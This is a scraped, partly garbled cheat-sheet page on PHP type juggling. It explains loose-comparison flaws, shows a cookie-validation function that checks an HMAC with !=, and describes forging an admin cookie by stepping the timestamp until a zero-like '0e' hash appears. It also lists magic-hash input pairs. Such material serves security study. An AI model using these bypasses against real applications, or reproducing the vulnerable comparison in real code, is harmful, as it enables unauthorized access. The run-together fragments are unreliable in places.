Hướng dẫn php type juggling payload
PHP provides two ways to compare two variables: PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead
of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs. PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are
finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like '123' == 123 '123a' == 123 'abc' == 0 '' == 0 == false == NULL '' == 0 # true 0 == false # true false == NULL # true NULL == '' # true NULL statementsvar_dump(sha1([])); # NULL var_dump(md5([])); # NULL Example vulnerable codefunction validate_cookie($cookie,$key){ $hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['$expiration'], $key); if($cookie['hmac'] != $hash){ // loose comparison return false; ... The If we can make the calculated hash string Zero-like, and provide "0" in the "0e768261251903820937390661668547" == "0" We have control over 3 elements in the cookie:
Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC. hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49" hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4" hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b" hash_hmac(admin|1424869666) -> "105c0abe89825a14c471d4f0c1cc20ab" ... hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e174892301580325162390102935332" == "0" Magic Hashes - ExploitIf the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
var_dump(md5('240610708') == md5('QNKCDZO')); # bool(true)
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?> References
|